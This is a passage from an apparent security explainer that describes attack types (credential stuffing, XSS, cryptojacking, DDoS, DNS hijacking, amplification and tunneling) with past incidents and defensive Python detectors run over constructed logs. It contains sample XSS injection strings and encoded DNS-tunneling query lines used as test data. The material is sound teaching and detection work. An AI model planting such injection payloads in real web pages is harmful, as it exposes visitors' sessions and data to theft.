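SAMPLE_LOG = """\
1700000000,10.0.0.5,203.0.113.7,443,512
1700000060,10.0.0.5,203.0.113.7,443,498
1700000121,10.0.0.5,203.0.113.7,443,530
1700000180,10.0.0.5,203.0.113.7,443,505
1700000241,10.0.0.5,203.0.113.7,443,512
1700000300,10.0.0.5,203.0.113.7,443,501
1700000013,10.0.0.9,198.51.100.20,443,10240
1700000150,10.0.0.9,198.51.100.20,443,3070
1700000155,10.0.0.9,198.51.100.20,443,88000
1700000700,10.0.0.9,198.51.100.20,443,1500
"""


def parse_log(text):
    """Group (timestamp, bytes_out) events by (src, dst, port) flow."""
    flows = defaultdict(list)
    for line in text.strip().splitlines():
        ts, src, dst, port, size = line.split(",")
        flows[(src, dst, int(port))].append((int(ts), int(size)))
    return flows


def beacon_score(events):
    """Return (mean interval, interval jitter, payload-size variation).

    Jitter is the coefficient of variation of inter-arrival times; a true
    timer-driven beacon has a small value even if the attacker adds noise.
    """
    ts = sorted(t for t, _ in events)
    intervals = [b - a for a, b in zip(ts, ts[1:])]
    sizes = [s for _, s in events]
    m = mean(intervals)
    jitter = pstdev(intervals) / m if m else float("inf")
    size_cv = pstdev(sizes) / mean(sizes)
    return m, jitter, size_cv


def find_beacons(text, min_events=5, max_jitter=0.2, max_size_cv=0.25):
    """Flag flows with enough connections whose timing and size are regular."""
    hits = []
    for (src, dst, port), events in parse_log(text).items():
        if len(events) < min_events:
            continue
        m, jitter, size_cv = beacon_score(events)
        if jitter <= max_jitter and size_cv <= max_size_cv:
            hits.append({"src": src, "dst": dst, "port": port,
                         "interval_s": round(m), "jitter": round(jitter, 3)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit)
```

In production the same logic runs over a day of proxy or firewall logs per internal host; the interesting tuning knobs are the minimum event count (too low and scheduled software updates trip it) and the jitter ceiling (attackers add randomness, so 20 to 30 percent is a realistic ceiling rather than near zero).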


Compromised Credentials

In 2020, Marriott International suffered a massive data breach as a result of a compromised credentials attack. This breach compromised the accounts of 5.2 million Marriott customers, exposing their contact information, gender, date of birth and loyalty account information. The attacker used the login credentials of two Marriott employees, presumably obtained through a mix of phishing and credential stuffing, to collect Marriott customers’ information for an entire month before raising suspicion.

What you need to know:
Most people still use single-factor authentication to identify themselves (a pretty big no-no in the cybersecurity space). And while stricter password requirements are starting to be enforced (like character length, a combination of symbols and numbers, and renewal intervals), end users still repeat credentials across accounts, platforms and applications, failing to update them periodically. This type of approach makes it easier for adversaries to access a user’s account, and a number of today’s breaches are thanks to these credential harvesting campaigns.

How the attack happens:
A password, key or other identifier that’s been discovered can be used by a threat actor to gain unauthorized access to information and resources, and can range from a single account to an entire database. By leveraging a trusted account within a targeted organization, a threat actor can operate undetected and exfiltrate sensitive data sets without raising any red flags. Common methods for harvesting credentials include the use of password sniffers, phishing campaigns or malware attacks.

Where the attack comes from:
Compromised credentials represent a huge attack vector, giving threat actors a way into computing devices, password-protected accounts and an organization’s network infrastructure with relative ease. These perpetrators are often organized, with their sights set on a specific organization or person. And they’re not always outside of the organization — they could very well be an insider threat who has some level of legitimate access to the company’s systems and data.


Credential Dumping

Disney+ signed up 10 million users and its stock hit a record high shortly after the launch of the streaming service. But that shine quickly faded when many of those eager subscribers began complaining about being locked out of their accounts. Within days of the launch, Disney+ credentials were up for grabs for as little as three dollars. Disney said the site wasn’t actually breached — allegedly, users who found their credentials online likely fell victim to a common (but notoriously bad) practice: using the same password across multiple sites that were later hit by a credential dumping attack.

What you need to know:
Credential dumping simply refers to an attack that relies on gathering credentials from a targeted system. Even though the credentials may not be in plain text — they’re often hashed or encrypted — an attacker can still extract the data and crack it offline on their own systems. This is why the attack is referred to as “dumping.” Often, hackers will try to steal passwords from systems they have already compromised. The problem becomes amplified when users replicate the same password across multiple accounts through multiple systems.

How the attack happens:
Credentials obtained this way usually include those of privileged users, which may provide access to more sensitive information and system operations. Hackers often target a variety of credential stores to extract them, including the Security Accounts Manager (SAM), the Local Security Authority (LSA), NTDS from domain controllers or Group Policy Preference (GPP) files. Once attackers obtain valid credentials, they use them to move throughout a target network with ease, discovering new systems and identifying assets of interest.

Where the attack comes from:
Credential dumping can originate from anywhere. And because we’re all guilty of recycling passwords, that information can be sold for future attacks.


Credential Reuse Attack

One of the more notable credential reuse attacks is the 2019 Dunkin’ Donuts breach — which, unluckily for the East Coast chain, happened to be their second hack in two months. This time around, the threat actors went so far as to sell thousands of accounts on the dark web. They sold users’ credentials — including their usernames and passwords — to the highest bidder, who could then try them across other consumer websites until they got a hit.

What you need to know:
Credential reuse is a pervasive issue across any company or userbase. Nowadays, most users have tens (if not hundreds) of accounts, and are tasked with remembering countless passwords that meet all sorts of stringent requirements. As a result, they’ll resort to reusing the same password over and over again, in the hopes of better managing and remembering their credentials across accounts. Unsurprisingly, this can cause major security issues when said credentials are compromised.

How the attack happens:
In theory, the attack itself is simple, straightforward and surprisingly stealthy (if two-factor authentication isn’t activated). Once a user’s credentials are stolen, the culprit can try the same username and password on other consumer or banking websites until they get a match — hence the “reuse” in “credential reuse attack.” However, gaining entry in the first place is a little more complicated. To get privileged information, attackers usually kick things off with a phishing attempt, using emails and websites that look close-to-legitimate to dupe the user into handing over their credentials.

Where the attack comes from:
This could be a targeted attack, where the person knows the victim and wants access to their accounts for personal, professional or financial reasons. The attack could also originate from a complete stranger who bought the user’s personal information on the cybercrime underground.


Credential Stuffing

Fort Lauderdale-based Citrix Systems found itself neck deep investigating a major network breach in 2019 that had occurred the previous year, resulting in stolen business documents by hackers. The FBI believed the breach was the result of “password spraying,” otherwise known as credential stuffing — an attempt by hackers to remotely access a large number of accounts at once. According to a form 10-K filing to the U.S. Securities and Exchange Commission, Citrix believed the hackers tried to infiltrate company systems to access content collaboration customer accounts.

What you need to know:
With credential stuffing, cybercriminals will use stolen account credentials — often usernames and passwords procured from a data breach — to access additional accounts by automating thousands or millions of login requests directed against a web application. They want to access sensitive accounts the easy way — by simply logging in. It works because they rely on people reusing the same usernames and passwords across multiple services. If they’re successful, one credential can unlock accounts that house financial and proprietary information, giving them the keys to almost everything.

How the attack happens:
Hackers only need access to login credentials, an automated tool and proxies to carry out a credential stuffing attack. Attackers will take a cache of usernames and passwords, gleaned from massive corporate breaches, and by using automated tools, essentially “stuff” those credentials into the logins of other sites.

Where the attack comes from:
Proxies mask the location of credential stuffing attackers, making it challenging to detect their location. But they can be found all over the world, especially in organized cybercrime hotspots. Often, attackers will be individual and organized hackers with access to dedicated account-checking tools and numerous proxies that prevent their IP addresses from being blocked. Less-sophisticated perpetrators may end up giving themselves away by attempting to infiltrate a large number of accounts via bots, which results in an unexpected distributed denial-of-service (DDoS) scenario.
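Both the credential reuse and credential stuffing sections above come down to the same two signatures in a web application’s login log: one source trying many different usernames in a short window, and one account being tried from many different sources (the proxy rotation the “Where” column describes). The following added example, which is not code from Splunk’s report, runs both checks over constructed log lines; the log format, thresholds and addresses are assumptions.

```python
"""Flag credential-stuffing patterns in web-application login logs.

Added example, not Splunk's code. Each constructed log line is
"epoch_ts src_ip username result" with result ok|fail. Thresholds are
assumptions to be tuned per application.
"""
from collections import defaultdict

# Constructed sample: one proxy walking a username list, one account
# sprayed from several rotating addresses, and one ordinary user who
# mistyped a password once.
SAMPLE_AUTH_LOG = """\
1700000001 198.51.100.10 alice fail
1700000002 198.51.100.10 bob fail
1700000003 198.51.100.10 carol fail
1700000004 198.51.100.10 dave ok
1700000005 198.51.100.10 erin fail
1700000006 198.51.100.10 frank fail
1700000010 203.0.113.5 alice fail
1700000011 203.0.113.6 alice fail
1700000012 203.0.113.7 alice fail
1700000013 203.0.113.8 alice ok
1700000020 192.0.2.44 gina fail
1700000030 192.0.2.44 gina ok
"""


def parse(text):
    for line in text.strip().splitlines():
        ts, ip, user, result = line.split()
        yield int(ts), ip, user, result


def sliding_windows(events, window_s):
    """Yield every window of time-sorted events whose span fits in window_s."""
    start = 0
    for end in range(len(events)):
        while events[end][0] - events[start][0] > window_s:
            start += 1
        yield events[start:end + 1]


def stuffing_sources(text, window_s=300, min_users=5, min_fail_ratio=0.6):
    """Sources trying many distinct usernames with a high failure ratio inside
    one window: the single-proxy stuffing signature."""
    by_ip = defaultdict(list)
    for ts, ip, user, result in parse(text):
        by_ip[ip].append((ts, user, result))
    flagged = {}
    for ip, events in by_ip.items():
        for window in sliding_windows(sorted(events), window_s):
            users = {u for _, u, _ in window}
            fails = sum(r == "fail" for _, _, r in window)
            if len(users) >= min_users and fails / len(window) >= min_fail_ratio:
                flagged[ip] = {"distinct_users": len(users),
                               "attempts": len(window),
                               "successes": len(window) - fails}
    return flagged


def sprayed_accounts(text, window_s=300, min_ips=3):
    """Accounts attempted from many source IPs in one window: the distributed,
    proxy-rotating signature that per-IP rate limiting alone misses."""
    by_user = defaultdict(list)
    for ts, ip, user, result in parse(text):
        by_user[user].append((ts, ip, result))
    flagged = {}
    for user, events in by_user.items():
        for window in sliding_windows(sorted(events), window_s):
            ips = {ip for _, ip, _ in window}
            if len(ips) >= min_ips:
                flagged[user] = {"distinct_ips": len(ips),
                                 "succeeded": any(r == "ok" for _, _, r in window)}
    return flagged


if __name__ == "__main__":
    print("stuffing sources:", stuffing_sources(SAMPLE_AUTH_LOG))
    print("sprayed accounts:", sprayed_accounts(SAMPLE_AUTH_LOG))
```

The second check is the one worth keeping even when the first is noisy: a successful login on an account that was just attempted from several unrelated addresses is a strong signal to force a step-up (re-authentication or MFA) rather than simply block the IP.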


Cross-Site Scripting

In January of 2019, an XSS vulnerability was discovered in the Steam Chat client operated by Valve, a computer gaming company with more than 90 million active users, any number of whom could have been attacked until the bug was disclosed. Cross-site scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. It’s conceptually like an SQL injection — where malicious code is entered into a form to gain access to the site’s database — except that in the case of XSS, the malicious code is designed to execute within the browser of another visitor to the site, allowing the attacker to steal user cookies, read session IDs, alter the contents of a website or redirect a user to a malicious site.

What you need to know:
XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are widespread and occur anywhere a web application includes input from a user in the output it generates without validating or encoding it. The end user’s browser has no way to know that the script should not be trusted, and executes it automatically. Because it thinks the script came from a trusted source, the script can access cookies, session tokens or other sensitive information retained by the browser. These scripts can even rewrite the content of the HTML page.

How the attack happens:
There are two types of XSS attacks: stored and reflected. Stored XSS attacks occur when an injected script is stored on the server in a fixed location, like a forum post or comment. Every user that lands on the infected page will be affected by the XSS attack. In reflected XSS, the injected script is served to a user as a response to a request, like a search results page.

Where the attack comes from:
While XSS attacks are not as common as they once were — due primarily to improvements in browsers and security technology — they’re still prevalent enough to rank within the top ten threats listed by the Open Web Application Security Project, and the Common Vulnerabilities and Exposures database lists nearly 14,000 vulnerabilities associated with XSS attacks.
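The root cause named above, user input placed into generated HTML without encoding, is easiest to see with the vulnerable and the corrected rendering side by side. This is an added example, not code from Splunk’s report: it renders a stored comment and a reflected search term first unsafely and then with context-appropriate output encoding, and uses the standard-library HTML parser to show what a browser would treat as executable in each case. The payloads and markup are constructed.

```python
"""Stored and reflected XSS: unsafe rendering beside output encoding.

Added example, not the page's code. The comment (stored XSS) and search
term (reflected XSS, landing inside an attribute) are constructed inputs.
"""
import html
from html.parser import HTMLParser

# Constructed attacker-supplied values as they would arrive from a comment
# form (stored on the server) and from a search box (echoed in the response).
STORED_COMMENT = '<script>alert("xss")</script>'
SEARCH_TERM = '" autofocus onfocus="alert(1)'


def render_unsafe(comment, query):
    """Interpolates untrusted strings straight into HTML. The comment's script
    runs in every visitor's browser; the query closes the value attribute and
    adds an event-handler attribute of its own."""
    return (f'<div class="comment">{comment}</div>\n'
            f'<input name="q" value="{query}">')


def render_safe(comment, query):
    """Same template with output encoding. html.escape converts & < > to
    entities; quote=True also encodes " and ', which is what neutralises the
    attribute-context injection."""
    return (f'<div class="comment">{html.escape(comment)}</div>\n'
            f'<input name="q" value="{html.escape(query, quote=True)}">')


class ActiveContentFinder(HTMLParser):
    """Records what a browser would execute: script elements and any
    on* event-handler attribute on any element."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for name, _ in attrs:
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name}")


def active_content(fragment):
    """Return the executable constructs found in an HTML fragment."""
    parser = ActiveContentFinder()
    parser.feed(fragment)
    parser.close()
    return parser.findings


if __name__ == "__main__":
    print("unsafe:", active_content(render_unsafe(STORED_COMMENT, SEARCH_TERM)))
    print("safe:  ", active_content(render_safe(STORED_COMMENT, SEARCH_TERM)))
```

Encoding has to match the context: html.escape is right for element text and quoted attribute values, but a value dropped into a JavaScript block, a URL or a CSS property needs that context’s own encoding, and a templating engine with auto-escaping on by default removes the chance of forgetting.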


Cryptojacking Attack

Cyber hackers compromised numerous Australian government websites with malware that forced visitors’ computers to secretly mine cryptocurrency without their permission. The cryptojacking attack was initiated when hackers exploited a vulnerability in a popular browser plugin as part of a larger global security breach. The attack affected the official website of the Victorian parliament, the Queensland Civil and Administrative Tribunal, and the Queensland Community Legal Centre homepage, among others, as well as the UK’s National Health Service and the UK’s own data protection watchdog site.

What you need to know:
Cryptojacking is an attack where a hacker targets and hijacks computer systems with malware that hides on a device and then exploits its processing power to mine for cryptocurrency — such as Bitcoin or Ethereum — all at the victim’s expense. The hacker’s mission is to create valuable cryptocurrency with someone else’s computing resources.

How the attack happens:
One common way cryptojacking attacks happen is by sending a malicious link in a phishing email, enticing users to download cryptomining code directly onto their computer. Another way is by embedding a piece of JavaScript code into a webpage that the user visits — known as a drive-by attack. Upon visiting the page, malicious code intended to mine cryptocurrency will automatically download on the machine. The cryptomining code then works silently in the background without the user’s knowledge — and a slower than usual computer might be the only indication that something is wrong.

Where the attack comes from:
These attacks come from all over the world because cryptojacking doesn’t require significant technical skills. Cryptojacking kits are available on the deep web for as little as $30. It’s a low bar of entry for hackers that want to make a quick buck for relatively little risk. In one attack, a European bank experienced some unusual traffic patterns on its servers, slower than average night processes, and unexplained online servers — all attributed to a rogue staffer who installed a cryptomining system.


Data From Information Repositories

The threat group APT28 reportedly compromised Hillary Clinton’s campaign, the Democratic National Committee (DNC) and the Democratic Congressional Campaign Committee (DCCC) during Clinton’s presidential run against Donald Trump. The group has also targeted Eastern European governments, military and security-related organizations, including the North Atlantic Treaty Organization (NATO). The group uses a complex set of tools and strategies, surreptitiously accessing information repositories to control and steal data. APT28 has collected information from Microsoft SharePoint services within target networks.

What you need to know:
Information repositories are tools that allow for the storage of information — tools like Microsoft SharePoint and Atlassian Confluence. Information repositories typically facilitate collaboration or information sharing between users and they store a wide variety of data that may tempt attackers. Hackers may leverage information repositories to access and mine valuable information.

How the attack happens:
Information repositories often have a large user base, and detecting breaches can be difficult. Attackers may collect information from shared storage repositories hosted on cloud infrastructure or in software-as-a-service (SaaS) applications.

Where the attack comes from:
Attackers like APT28 target government agencies, hotel booking websites, telecoms and IT companies. At a minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, enterprise or schema administrators) should be closely monitored and alerted upon, because these types of accounts should not generally be used to access information repositories. Additional log storage and analysis infrastructure will likely be required for more robust detection capabilities.


DDoS Attack

To date one of the biggest — if not the most significant — distributed denial-of-service (DDoS) attacks happened in 2018 against popular online code management system GitHub. GitHub was hit by an onslaught of traffic, which at its peak came in at a rate of 1.3 terabytes per second, sending packets at a rate of 126.9 million per second. The attack wasn’t just massive, it was record-breaking. In this attack, the botmasters flooded memcached servers with spoofed requests, which gave them the ability to amplify their attack by 50,000x. The good news? GitHub wasn’t caught entirely unprepared. Administrators were alerted to the attack and it was shut down within 20 minutes.

What you need to know:
A DDoS attack is an attempt by hackers, hacktivists or cyber spies to take down websites, slow down and crash the target servers and make online service unavailable by flooding them with traffic from multiple sources. As their name suggests, DDoS attacks are widely distributed brute-force attempts to wreak havoc and cause destruction. These attacks often tend to target popular or high-profile sites, such as banks, news and government websites, to thwart or deter target organizations from publishing important information or to weaken them financially.

How the attack happens:
The malicious actors behind DDoS attacks aim to wreak havoc on their targets, sabotage web properties, damage brand reputation and prompt financial losses by preventing users from accessing a website or network resource. DDoS leverages hundreds or thousands of infected “bot” computers located all over the world. Known as botnets, these armies of compromised computers will execute the attack at the same time for full effectiveness. The hacker or group of hackers that control these infected computers then become botmasters, who infect vulnerable systems with malware, often Trojan viruses. When enough devices are infected, the botmaster gives them the command to attack and the target servers and networks are bombarded with requests for service, which in turn effectively chokes them and shuts them down.

Where the attack comes from:
As their name implies, DDoS attacks are distributed, meaning that the incoming flood of traffic targeting the victim’s network originates from numerous sources. Thus, the hackers behind these attacks can literally be from anywhere in the world. What’s more, their distributed nature makes it impossible to stop these attacks simply by securing or blocking a single source.


Disabling Security Tools

Sometimes hackers use the very tools meant to protect organizations to gain access to their systems. Microsoft Windows became the world’s desktop operating system of choice when it was first released in 1985. And while its market share has gotten smaller in recent years, it still remains a dominant force compared to its distant runner up, Apple OSX. The mass adoption of Windows, and the fact that it’s easier to fall victim to attacks, such as malware and bots, has made it a favorite playground for hackers. That’s partly why Microsoft began installing a native anti-spyware and antivirus program, called Windows Defender, with the release of Windows Vista. Unfortunately Microsoft didn’t consider that hackers would attack the very thing supposed to protect Windows users. Novter, also known as Nodersok or Divergent, was a Trojan attack that took down Windows Defender’s real-time protection features. Once disabled, the Trojan would download additional malware to the system.

What you need to know:
Hackers use a variety of techniques to avoid detection and operate without barriers. This often involves modifying the configuration of security tools, such as firewalls, to get around them or explicitly disabling them to prevent them from running at all. Other times, attackers attempt various tricks to prevent specific programs from running, such as adding certificates that assign security tools to a blacklist, preventing those protection tools from running altogether.

How the attack happens:
The fingerprints of this attack revolve around hackers trying to disable various security mechanisms. They may attempt to gain access to registry files, where much of the configuration for Windows and various other programs lives. The hackers may also attempt to shut down security-related services.

Where the attack comes from:
An attack centered around disabling security tools can originate anywhere because these types of attacks can target an almost endless list of tools. The Nodersok attack, for example, mostly attacked PC users in the U.S. and the U.K. (81%).


DNS Attacks
DNS Amplification

In February 2022, hackers launched massive, amplified distributed denial-of-service (DDoS) attacks through Mitel, a global business communications company. The attack pummeled financial institutions, broadband ISPs, logistics and gaming companies, and other organizations. Able to sustain DDoS attacks for up to 14 hours, with a record-breaking amplification factor of almost 4.3 billion to one, attacks like this are capable of shutting down voice communications and other services for entire organizations with a single malicious network packet.

What you need to know:
In a DNS amplification attack, the attacker floods a website with so many fake DNS lookup requests that it eats up the network bandwidth until the site fails. Where DNS hijacking might direct traffic to another site, a DNS amplification attack prevents the site from loading. The difference between the two attacks is further illustrated by the word “amplification.” In this attack, hackers make the DNS requests in a way that requires a more intensive response. For example, a hacker might request more than just the domain name. The attacker might also ask for the entire domain, known as an “ANY record,” which requests the domain along with the subdomain, mail servers, backup servers, aliases and more. Now imagine several of these “ANY” requests coming in at once. The amplified traffic is enough to take the site offline.

How the attack happens:
Though DNS amplification, a type of DDoS attack, has been around for a long time, the exploitation techniques keep evolving. The attack is similar to DNS hijacking in the sense that it takes advantage of the internet’s directory by misconfiguring it. But the way the attacks occur is slightly different. A DNS amplification attack typically involves sending a small amount of information to a vulnerable network service that causes it to reply with a much larger amount of data. By directing that response at a victim, an attacker can put in a relatively low amount of effort while making other people’s machines do all the work of flooding a selected target offline.

Where the attack comes from:
Similar to a DNS hijacking attack, the relatively primitive nature of the attack means it can originate from anywhere in the world, be it nation-state hackers or a lone wolf.
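The “small request, much larger reply, aimed at someone else” mechanism described above is visible from the reflector’s side, which is where an operator running a resolver can detect and stop it. The following added example, not code from Splunk’s report, works through constructed resolver log lines: it computes the amplification factor (response bytes per request byte, the same ratio behind the 50,000x memcached figure in the DDoS section) and flags sources that are outside the resolver’s intended client range yet receiving large ANY responses, which is the signature of a spoofed victim being used as a reflection target. The log format, the internal prefix and the thresholds are assumptions.

```python
"""Spot reflection/amplification abuse in resolver query logs.

Added example, not Splunk's code. Constructed log format:
"ts client qname qtype req_bytes resp_bytes". The resolver is assumed to
serve only 10.0.0.0/8; any other client address in the log is a source the
attacker spoofed so that the large responses land on that victim.
"""
import ipaddress
from collections import defaultdict

INTERNAL = ipaddress.ip_network("10.0.0.0/8")  # assumed intended client range

# Constructed sample: normal internal lookups plus a burst of ANY queries
# whose "client" is an external address (the real target of the flood).
SAMPLE_RESOLVER_LOG = """\
1700000000 10.1.2.3 www.example.com A 44 60
1700000001 10.1.2.9 mail.example.com MX 45 120
1700000002 203.0.113.50 isc.org ANY 37 3223
1700000002 203.0.113.50 isc.org ANY 37 3223
1700000003 203.0.113.50 isc.org ANY 37 3223
1700000003 203.0.113.50 ripe.net ANY 38 2950
1700000004 10.1.2.3 example.com TXT 40 210
"""


def parse(text):
    for line in text.strip().splitlines():
        ts, client, qname, qtype, req, resp = line.split()
        yield int(ts), ipaddress.ip_address(client), qname, qtype, int(req), int(resp)


def amplification_factor(req_bytes, resp_bytes):
    """Bytes returned per byte sent. A ratio far above 1 is what makes a
    protocol useful as an amplifier; for DNS ANY over UDP values in the tens
    are common, and the memcached case reached tens of thousands."""
    return resp_bytes / req_bytes


def reflection_targets(text, min_factor=10.0, min_queries=3):
    """External 'clients' that received many large responses: victims of
    reflection through this resolver rather than genuine users."""
    per_client = defaultdict(lambda: {"queries": 0, "sent": 0, "returned": 0, "any": 0})
    for _, client, _, qtype, req, resp in parse(text):
        stats = per_client[client]
        stats["queries"] += 1
        stats["sent"] += req
        stats["returned"] += resp
        if qtype == "ANY":
            stats["any"] += 1
    flagged = {}
    for client, stats in per_client.items():
        factor = amplification_factor(stats["sent"], stats["returned"])
        external = client not in INTERNAL
        if external and stats["queries"] >= min_queries and factor >= min_factor:
            flagged[str(client)] = {"factor": round(factor, 1),
                                    "any_queries": stats["any"],
                                    "returned_bytes": stats["returned"]}
    return flagged


if __name__ == "__main__":
    print(reflection_targets(SAMPLE_RESOLVER_LOG))
```

The fixes are on the resolver operator’s side: answer only the intended client range (no open recursion), apply response rate limiting per destination, and return minimal answers to ANY queries as RFC 8482 describes, so the factor that makes the attack worthwhile disappears.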


DNS Attacks
DNS Hijacking

On a Thursday morning in 2017, WikiLeaks readers woke up expecting to find the latest state secret released on the whistleblowing website, only to discover a message from a hacker collective called OurMine announcing that they were in control of the domain. Wikileaks founder Julian Assange quickly took to Twitter to clarify that the takedown was not a traditional hack, but instead a domain name system (DNS) attack.

What you need to know:
DNS is often called the Achilles heel of the internet, or the internet’s phonebook, because it plays a critical role in routing web traffic. The DNS is the protocol used to map domain names to IP addresses. It has been proven to work well for its intended function. But DNS is notoriously vulnerable to attack, attributed in part to its distributed nature. DNS relies on unstructured connections between millions of clients and servers over inherently insecure protocols. The importance of securing DNS from attacks is undeniable. The fallout of compromised DNS can be disastrous. Not only can hackers bring down an entire business, they can intercept confidential information, emails and login credentials as well. In 2019, the U.S. Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency (CISA) raised concerns about high-profile DNS hijacking attacks against infrastructure, both in the United States and abroad.

How the attack happens:
The attack works when hackers exploit the way DNS communicates with an internet browser. The system acts as a phone book, translating a domain — like NYTimes.com — into an IP address. The DNS then looks up and finds which global server is hosting that site and then directs traffic to it. The attack happens when a hacker is able to disrupt the DNS lookup and then either push the site offline or redirect traffic to a site that the hacker controls.

Where the attack comes from:
There is no one singular profile of a DNS hijacker, largely because the attack can occur as easily as a social engineering attack in which someone calls a domain provider and tricks them into changing a DNS entry. Some of the more prominent DNS hijacking attacks have been attributed to hacking collectives such as OurMine in the Wikileaks case or the Syrian Electronic Army in takedowns of The New York Times and The Washington Post.
DNS Attacks
DNS Tunneling

A hacker group known as OilRig has made regular attacks on various governments and businesses in the Middle East using a variety of tools and methods over the past several years. An essential element of its efforts to disrupt daily operations and exfiltrate data is maintaining a connection between its command-and-control server and the system it’s attacking using DNS tunneling.

What you need to know:
The traffic passing through DNS often goes unmonitored, since it’s not designed for data transfer, leaving it vulnerable to several kinds of attacks, including DNS tunneling, which happens when an attacker encodes malicious data into a DNS query: a long string of characters prepended to the domain name being looked up. There are valid uses for DNS tunneling — anti-virus software providers use it to send updated malware profiles to customers in the background, for example. Because of the possibility of legitimate use, it’s important for organizations to monitor their DNS traffic thoroughly, allowing only trustworthy traffic to continue flowing through the network.

How the attack happens:
With DNS tunneling, an attacker can bypass security systems (tunneling under or around them, so to speak) by redirecting traffic to their own server, setting up a connection to an organization’s network. Once that connection is active, command and control, data exfiltration and a number of other attacks are possible.

Where the attack comes from:
While there are DNS tunneling tools readily available for download, attackers wishing to do more than bypass a hotel or airline’s paywall for internet access require more sophisticated knowledge. In addition, because DNS was designed only to resolve web addresses, it’s a very slow system for data transfer.
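Monitoring DNS traffic “thoroughly,” as the section above recommends, means scoring each query for the properties that encoded payloads force on a hostname: long subdomains, high character entropy, record types that carry arbitrary data (TXT, NULL), and many unique subdomains under one registered domain. The added example below is not Splunk’s code; it runs those checks over constructed query-log lines with an allowlist for a vendor known to move data over DNS legitimately, as the section notes for anti-virus updates. The log format, domain names, thresholds and the two-label registered-domain rule are assumptions (a real deployment would use the public suffix list).

```python
"""Score DNS queries for tunneling indicators and aggregate per domain.

Added example, not Splunk's code. Constructed query log: "ts client qname
qtype". Registered-domain extraction assumes a two-label suffix, a
simplification standing in for a public-suffix-list lookup.
"""
import math
from collections import defaultdict

# Constructed allowlist: a vendor domain that legitimately carries data over
# DNS (the anti-virus signature case the page mentions).
ALLOWLIST = {"av-updates.example"}

# Constructed sample: ordinary lookups, one allowlisted update check, and a
# host sending a stream of encoded TXT queries to an attacker-controlled zone.
SAMPLE_DNS_LOG = """\
1700000000 10.0.0.5 www.example.com A
1700000001 10.0.0.5 cdn.example.net A
1700000002 10.0.0.7 3q2z9x8k1v7b5n4m6c0p.sig.av-updates.example TXT
1700000003 10.0.0.9 aGVsbG8gd29ybGQgdGhpcyBpcw.t.exfil-c2.example TXT
1700000004 10.0.0.9 ZXhmaWx0cmF0ZWQgZGF0YSBibG9j.t.exfil-c2.example TXT
1700000005 10.0.0.9 ayBudW1iZXIgdHdvIG9mIHRoZSBz.t.exfil-c2.example TXT
1700000006 10.0.0.9 dHJlYW0gZ29lcyBoZXJlIGFuZCBt.t.exfil-c2.example TXT
1700000007 10.0.0.5 mail.example.com MX
"""


def shannon_entropy(s):
    """Bits of entropy per character; encoded payloads score well above
    dictionary-word hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (registered domain, subdomain part) under the two-label assumption."""
    labels = qname.rstrip(".").split(".")
    return ".".join(labels[-2:]), ".".join(labels[:-2])


def score_query(qname, qtype, min_len=24, min_entropy=3.5):
    """Per-query indicators. Returns (registered domain, subdomain, reasons)."""
    registered, sub = split_name(qname)
    reasons = []
    if len(sub) >= min_len:
        reasons.append("long_subdomain")
    if sub and shannon_entropy(sub) >= min_entropy:
        reasons.append("high_entropy")
    if qtype in {"TXT", "NULL"}:
        reasons.append("payload_qtype")
    return registered, sub, reasons


def tunneling_candidates(text, min_flagged=3, min_unique_subdomains=3):
    """Aggregate per registered domain: a tunnel produces many distinct,
    suspicious subdomains, while a normal zone repeats a handful of names."""
    per_domain = defaultdict(lambda: {"subs": set(), "flagged": 0, "clients": set()})
    for line in text.strip().splitlines():
        _, client, qname, qtype = line.split()
        registered, sub, reasons = score_query(qname, qtype)
        entry = per_domain[registered]
        entry["subs"].add(sub)
        entry["clients"].add(client)
        if len(reasons) >= 2:
            entry["flagged"] += 1
    return {
        dom: {"unique_subdomains": len(e["subs"]),
              "flagged_queries": e["flagged"],
              "clients": sorted(e["clients"])}
        for dom, e in per_domain.items()
        if dom not in ALLOWLIST
        and e["flagged"] >= min_flagged
        and len(e["subs"]) >= min_unique_subdomains
    }


if __name__ == "__main__":
    print(tunneling_candidates(SAMPLE_DNS_LOG))
```

Query volume per client toward one zone and the ratio of NXDOMAIN responses are the next two features to add; the allowlist is what keeps the check usable, since without it every CDN and telemetry vendor that legitimately uses long hashed hostnames would surface.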


DoS Attack

Almost two decades ago, a 16-year-old hacker known as Mafiaboy launched one of the most famous denial-of-service (DoS) attacks that took several major sites offline, including CNN, eBay, Amazon and Yahoo. According to reports, Mafiaboy broke into dozens of networks to install malware designed to flood targets with attack traffic. Because many sites were underprepared for such an assault, the attack lasted about a week as the targeted organizations struggled to figure out what happened and how to get back online. Mafiaboy was eventually arrested and sentenced to juvenile detention. Twenty years later, DoS attacks (many of which are DDoS) continue to be on the rise and are some of the most common attacks faced by organizations, targeting around a third of all businesses.

What you need to know:
A DoS attack is where cyberattackers make a machine or network inaccessible for its intended users. DoS attacks can be executed by either flooding networks with traffic or by sending information that triggers a system slowdown or complete crash. As with DDoS attacks, DoS attacks tend to focus on high-profile organizations or ones with popular, public-facing websites such as banking, ecommerce, media or government institutions. DoS attacks deprive legitimate users of the service they want to access and cause extensive damage to the victim, due to security and cleanup costs, loss of reputation, loss of revenue and customer attrition.

How the attack happens:
DoS attacks occur in one of two ways: by flooding or crashing a targeted network. In flood attacks, cybercriminals bombard victim computers with more traffic than they can handle, causing them to slow or shut down altogether. Various flood attacks include buffer overflow attacks, ICMP flood and SYN flood attacks. Other DoS attacks exploit vulnerabilities that prompt the target system to crash. In these attacks, bad actors exploit system vulnerabilities with malware that subsequently triggers a crash or severely disrupts the system.

Where the attack comes from:
DoS attacks can originate from anywhere in the world. Attackers can easily mask their whereabouts so they can overwhelm victim computers, execute malware or conduct other nefarious deeds with the peace of mind that they won’t be detected.
